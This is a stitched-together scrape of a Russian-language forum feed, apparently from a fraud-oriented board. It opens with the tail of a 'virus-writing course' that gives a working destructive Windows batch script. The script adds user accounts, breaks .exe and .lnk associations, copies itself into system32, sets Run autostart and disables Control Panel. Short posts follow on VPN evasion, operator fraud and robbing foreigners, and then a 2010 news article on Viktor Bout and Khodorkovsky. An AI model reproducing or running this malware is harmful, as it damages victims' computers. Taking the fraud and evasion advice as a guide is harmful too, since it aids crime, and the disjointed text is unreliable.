HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f Очень жестокая команда: добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, а едем дальше)) assoc .lnk=.txt >nul assoc .exe=.mp3 >nul Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с .lnk в .txt и .exe в .mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Круто, да? Теперь прочтите нижний код и если вы поняли, в чем суть вируса, поздравляю вас вы закончили базовый курс, от SMOKED'а, вирусо-писательства. Если же нет. Читаем все заново)) @echo off %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul time 0:00 >nul date 13.06.23 >nul label C:IDIOT >nul label D:URAK >nul label E:SUKA >nul label F:GANDON >nul copy %0 C:\Open.bat >nul copy %0 D:\Open.bat >nul copy %0 E:\Open.bat >nul copy %0 F:\Open.bat >nul net user "Idiot you Hacked" /add >nul net user "Bitch you Hacked" /add >nul net user "Durak you Hacked" /add >nul net user "Kritin you Hacked" /add >nul net user "Gavno you Hacked" /add >nul md 1 >nul md 2 >nul md 3 >nul md 4 >nul md 5 >nul md 6 >nul md 7 >nul md 8 >nul md 9 >nul md 10 >nul md 11 >nul md 12 >nul md 13 >nul md 14 >nul md 15 >nul md 16 >nul md 17 >nul md 18 >nul md 19 >nul md 20 >nul md 21 >nul md 22 >nul md 23 >nul md 24 >nul md 25 >nul md 26 >nul md 27 >nul assoc .lnk=.txt >nul assoc .exe=.txt >nul :x ; Start mspaint goto x ; :x ; Start Calc goto x ; copy ""%0"" "%SystemRoot%\system32\Cool.bat" >nul reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul del %0 >nul
-
1 балл
-
1 баллтак брокерам и выгодно чтобы люди проигрывали.. Заявки НЕ ВЫСТАВЛЯЮТСЯ, игра по сути идет только внутри брокера... Кому нужны лоты по 1000 долларов в мире?!
-
1 баллПолезная информация, но когда же торговать? Тут чтения на полгода...
-
1 баллAZAZELLO- а где такие добряки в департаменте по регистрации? Они обычно говорят "не консультируем". Зато потом могут завернуть регистрацию из-за ерунды.
-
1 баллЯ конечно вижу огромный плюс в том что есть человек дата центре, но у меня таких знакомых нет и не предвидится Вообще до конца не понимаю , как некоторые могут утверждать , что 3g отслеживается с точностью до 5 метров. Я в первом посте написал что не люблю 3g из-за малых скоростей. а под впном так вообще как с телефона будет... Expert, что думаешь если поднять впн на впс где нибудь далеко за бугром? В панаме к примеру. И твое отношение к сегодняшним сервисам впн ? Которых овердохуя развелось.
-
1 баллДайте текста с выебонами на сапорта) На счет расовой дискриминации, тема про геев, угрозы с подачей в суд и т.д.
-
1 балл
-
1 баллСомневаюсь что их будут искать по имею, да и если найдут, то ничего не будет, солидарен со вторым постом. Купил, не знаю, не помню
-
1 балл
-
1 баллпричем тут бан? Ты думаешь когда грабишь пендосов, они не отсылают запросы к русским? Как раз по этому они больше для себя берут этих людей в оборот. Отписку дал что человек не найден, и все. А те кто по рашке работает, для звездочек
-
1 балля общаюсь с людьми со СБ ОПСОСов так схемы более банальны заказывают на конторах спам смс рассылку через контент провайдеров арендуют короткие номера и лохи на них смски кидают и перезванивают а задача СБ лочить счета на номерах и забирать лаве себе родным а фрод толком и не раследуют реагируют в основном на жалобы в кол центр и смотрят активность аков абонентов если за короткий промежуток времени туда накидывают от 1к его лочат до выяснения как на WM
-
1 баллСМИ: "оружейный барон" Бут может вернуться в Россию в обмен на освобождение Ходорковского время публикации: 08:53 последнее обновление: 09:58 Российский предприниматель Виктор Бут, арестованный в Бангкоке в 2008 году по обвинению в причастности к контрабанде оружия и экстрадированный в США в ноябре этого года, вернется в Россию на Рождество. Такое сенсационное заявление сделал еженедельнику "Аргументы недели" высокопоставленный сотрудник одной из российских спецслужб. По одной из версий, Бута могут обменять на ожидающего приговор по второму уголовному делу экс-главу ЮКОСа Михаила Ходорковского. Между тем, как отмечает издание, "обменный фонд" этим летом уже исчерпан. Как шутят в "конторе": отдали за Анку, даже не пулеметчицу, трех предателей-полковников и одного "сутягу-ботаника". Речь идет об обмене задержанных в США десяти русских шпионов-неудачников на четверых россиян, осужденных ранее в РФ за шпионаж. Остается только один, пишут "Аргументы недели", главный враг власти Михаил Ходорковский. Пока он не раз публично заявлял, что никогда не покинет Россию. Но если ему, как просит прокурор, на новом судебном процессе добавят 14 лет заключения, то "узник совести" может передумать. Хотя такому обмену может помешать Владимир Путин, у которого, по слухам, к Ходорковскому какая-то личная неприязнь. Масла в огонь премьер подлил в ходе очередной "прямой линии" с россиянами, позволив себе комментировать процесс против Ходорковского до оглашения приговора. Он, в частности, заявил, что вина экс-главы ЮКОСа "доказана судом", намекнул на причастность руководства этой нефтяной компании к ряду убийств и заключил: "Вор должен сидеть в тюрьме". Однако перенос оглашения нового приговора Ходорковскому и Лебедеву на 27 декабря, по данным источников газеты в российских спецслужбах, означает, что Путин готов сделать красивый новогодний жест. Сейчас идут тайные переговоры, отмечает издание. Дело Бута Российский бизнесмен Бут был арестован в марте 2008 года в Бангкоке, куда прибыл в качестве туриста. Его арест стал результатом операции американских спецслужб, к которой на последнем этапе подключили таиландскую полицию. Бывший офицер советских ВВС, Виктор Бут переехал за границу после распада СССР в 1992 году и занялся бизнесом. По некоторым данным, создание международной сети авиакомпаний предприниматель начал с покупки всего одного самолета. По его словам, в 1997 году он увеличил свое состояние, построив холодильную установку в Южной Африке и начав возить в Нигерию мороженых цыплят. Между тем, Интерпол располагает информацией, что уже к началу 2000 года в собственности Бута находилась целая сеть предприятий - от компании по ремонту самолетов в ОАЭ до чартерной компании в Майами (США). По сведениям министерства, Бут владеет сетью авиатранспортных предприятий, базирующихся в различных странах на Ближнем Востоке, в Африке, Восточной Европе и США. В США Бута считают крупнейшим нелегальным торговцем оружием в мире. Имя Виктора Бута впервые попало в документы в связи с подозрениями в контрабанде оружия еще 10 лет назад. В 2000 году был опубликован доклад ООН, в котором описывалась деятельность восточноевропейского картеля, занимающегося поставками оружия боевикам Анголы, Конго, Либерии, Сьерра-Леоне. Во главе этого объединения, по данным ООН, стоял отставной летчик из России Виктор Бут. Как отмечалось в докладе, Бут использует как минимум 7 паспортов и фамилий для сделок и передвижения по миру. Утверждалось, что Бут осуществил не менее 38 сделок по поставке оружия южноафриканским повстанцам, в том числе и группировке УНИТА. Боевики приобрели средства противовоздушной обороны, артиллерийские орудия, ПТУРСы, ЗРК и боеприпасы к минометам. В докладе отмечалось, что Бут торговал вооружением, произведенным на заводах Украины, Молдавии и Болгарии. Доход от торговли был огромным, утверждали в ООН, только УНИТА сбывала за год алмазов на сумму более 150 миллионов долларов. Эти алмазы, добываемые под контролем повстанцев, и являлись основной валютой при поставках вооружений в Африку. Американская прокуратура (Южного округа Нью-Йорка) предъявляет ему обвинения в сговоре с целью убийства американских граждан и военнослужащих, нелегальной торговле средствами ПВО и материальной поддержке терроризма. Последовавший экстрадиционный судебный процесс в Уголовном суде Таиланда выявил как отсутствие у американской стороны доказательств виновности Бута, так и ряд злоупотреблений и нарушений, допущенных американскими агентами при аресте. Кроме того, защита сконцентрировала свои усилия на предоставлении доказательств политического характера американских обвинений. Летом, 20 августа 2010 года суд первой инстанции постановил отказать США в экстрадиции россиянина. Однако американская сторона через прокуратуру, которая представляет на процессе ее интересы, подала апелляцию на это решение. Параллельно США предъявили Буту еще один комплект обвинений, на этот раз в отмывании денег и мошенничестве с использованием телеграфных переводов и интернета. В октябре Уголовный суд Таиланда отказал США и во втором запросе на экстрадицию Бута. Защита россиянина подала апелляцию на это решение, заявив, что формулировка судебного постановления не полностью удовлетворяет интересам ее подзащитного. Бут отрицает все обвинения и заявляет, что в прошлом владел совершенно легальным бизнесом в сфере международных авиаперевозок, который закрыл из-за потери рентабельности в 2001 году. В течение двух с половиной лет с начала процесса об экстрадиции Бута США неоднократно пытались оказать политическое давление на Таиланд в целях ускорения передачи россиянина американским властям. Генеральный прокурор США даже однажды, во время лекции для таиландских судей, попросил их обеспечить экстрадицию Бута в день его рождения, в качестве подарка. Россия вступилась за арестованного "оружейного барона", уверяя, что попытки добиться его экстрадиции в США противозаконны. Российская сторона отмечала, что американские обвинения в адрес Бута, копия которых была передана в Москву из США по требованию МИДа РФ, не подкреплены какой-либо доказательной базой. Представители России не раз заявляли, что если процесс по делу Бута будет проходить в юридическом поле без политического вмешательства извне, он неминуемо закончится освобождением россиянина. Между тем 16 ноября Таиланд неожиданно экстрадировал Бута в США. Экстрадиция последовала за решением правительства Таиланда, одобрившего выдачу бизнесмена Соединенным Штатам по обвинению в его причастности к контрабанде оружия. Дело Ходорковского Судебный процесс в Хамовническом суде Москвы начался 3 марта 2009 года, за 19 месяцев прошло около 280 заседаний. За это время суд изучил 188 томов материалов уголовного дела, а также многочисленные документы, в том числе протоколы собраний акционеров, решения арбитражных судов, постановления о выемках документов, договоры обмена акций. В суде выступил 81 свидетель: 52 - со стороны обвинения и 29 свидетелей защиты. В частности, суд допросил главу Сбербанка Германа Грефа и министра торговли и промышленности РФ Виктора Христенко. При этом в список обвинительно заключения в качестве свидетелей были включены 250 человек, а защита настаивала на вызове еще 300 свидетелей. Второе уголовное дело в отношении бывших руководителей ЮКОСа и МЕНАТЕП слушается председателем Хамовнического суда Виктором Данилкиным, со стороны обвинения в процессе принимает участие четыре прокурора. Интересы подсудимых в ходе процесса представляли около 10 адвокатов. В ходе прений сторон представители прокуратуры заявили, что считают доказанной вину Ходорковского и Лебедева во всех инкриминируемых преступлениях, несмотря на то, что они не признали свою вину. При этом обвинение снизило изначально инкриминируемый объем хищения с 350 до 218 млн т нефти, кроме того, обвинение считает, что подсудимые легализовали 487 млрд рублей и 7,5 млрд долларов, полученных от хищения. Прокуроры предложили квалифицировать действия подсудимых с учетом президентских поправок к Уголовный кодекс, которые смягчают ответственность по экономическим преступлениям. В то же время обвинение попросило освободить Ходорковского и Лебедева от наказания за хищение акций "Восточной нефтяной компании"(ВНК) из-за истечения сроков давности, хотя настаивало на том, что их виновность доказана. Прокуратура потребовала назначить каждому из подсудимых наказание в виде 14 лет лишения свободы в колонии общего режима. В свою очередь Ходорковский просил вынести оправдательный приговор, заявив, что и заявил, что их невиновность вытекает непосредственно из обвинительного заключения и показания свидетелей. Это второе уголовное дело в отношении Ходорковского и Лебедева. В мае 2005 года они были признаны Мещанским судом Москвы виновными по семи статьям УК РФ и осуждены к 9 годам, но в сентябре Мосгорсуд сократил им срок наказания до 8 лет. С учетом того, что срок заключения высчитывается с момента заключения под стражу, срок их заключения истекает у Платона Лебедева в июле 2011 года, у Михаила Ходорковского почти ровно через год - в октябре 2011 года. После вступления в силу первого приговора Лебедев был направлен в колонию в поселке Харп Ямало-Ненецкого автономного округа, Ходорковский - в Читинскую область. Но в 2007 году им было предъявлено новое обвинение. Расследование второго дела было направлено в суд в феврале 2009 года, тогда же обвиняемые были вновь этапированы в Москву. По новому уголовному делу они обвиняются в хищении чужого имущества в крупном и особо крупном размерах с использованием служебного положения. По версии следствия, обвиняемые в составе организованной группы в 1998-2003 годах совершили хищение путем присвоения крупных объемов нефти дочерних нефтедобывающих акционерных обществ НК "ЮКОС", "Самаранефтегаз", "Юганскнефтегаз" и "Томскнефть" ВНК на сумму более 892 млрд рублей. Также они обвиняются в легализации денежных средств в крупном размере, полученных от продажи похищенной нефти на общую сумму, превышающую 487 млрд рублей и 7,5 млрд долларов. В 2008 году адвокат Ходорковского Юрий Шмидт, отвечая на вопросы журналистов, сказал, что по действующему уголовному законодательству в случае нового обвинительного приговора Ходорковскому и Лебедеву может грозить до 22,5 лет лишения свободы. Дело ЮКОСа - одно из самых громких в России за последние годы. Правоохранительные органы обвинили руководство крупнейшей на тот момент нефтяной компании страны в целом ряде экономических преступлений. Впоследствии ЮКОС обанкротился, а его активы отошли государственной "Роснефти". Многие на Западе до сих пор считают "дело ЮКОСа" политически мотивированным, однако российские власти это категорически опровергают. Сам Ходорковский свое второе уголовное дело называет политически и коррупционно мотивированным и заявляет, что процесс инициирован людьми, которые не хотят его выхода на свободу. Уголовное преследование бывший глава нефтяной компании объясняет тем, что он поддерживал независимую оппозицию.